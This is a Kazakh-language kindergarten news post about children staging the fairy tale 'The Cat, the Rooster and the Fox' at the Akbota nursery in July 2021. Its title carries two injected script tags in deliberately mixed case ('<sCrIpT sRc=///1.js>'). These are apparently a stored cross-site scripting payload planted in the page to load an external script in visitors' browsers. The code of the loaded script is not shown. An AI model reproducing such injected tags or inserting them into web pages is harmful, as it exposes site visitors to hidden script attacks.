«Мысық, әтеш және түлкі» ертегісі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.07.2021

Уәлиханов көшесіндегі МКҚК «Ақбота» бөбекжайында тәрбиеші Есіркепова Балжан Жумадиллаевнаның ұйымдастыруымен І ересек «Көбелек»  тобының тәрбиеленушілері «Мысық, әтеш және түлкі" ертегісінің қойылымын қойып, тамашалады. Кейіпкерлер: әтеш-Раяна,  түлкі-Арайлым, мысық-Айнара  болды. Балалар «Мысық, әтеш және түлкі»  ертегісіне , қызығушылықпен  өз рөлдерін тамаша ойнап шықты, балалар белсенді қатысып, өздерін жақсы қырларынан көрсетті. Әр бала өзінің рөлін жақсы атқарды. Бұл ертегі әр балаға өте жақсы әсер қалдырып, көңіл-күйлері бір көтеріліп қалды. Ертегіні сахналау арқылы бүлдіршіннің шығармашылық қабілетін және сахна әр балаға қуаныш, ұмытылмас әсер сыйлайды, оның көркемдік талғамын, еліктеуі мен қиялын дамытады.   Осы «Мысық, әтеш  және түлкі » ертегісінің қойылымы арқылы балаларға бергені, бұл жерде балалар бір-біріне қандай да бір жағдайда көмектесу керектігі туралы айтылып, түсіндірілді. Ал қалған балалар көрермендер ретінде отырып, қызықтап қол шапалақтап тамашалады. Қорыта келгенде,  қамқорлық пен мейірімділікті әр баланың жүрегіне жеткізе алды.

 

Просмотров: 340


Пікір қосу



Деректерді қолтаңбаға қосу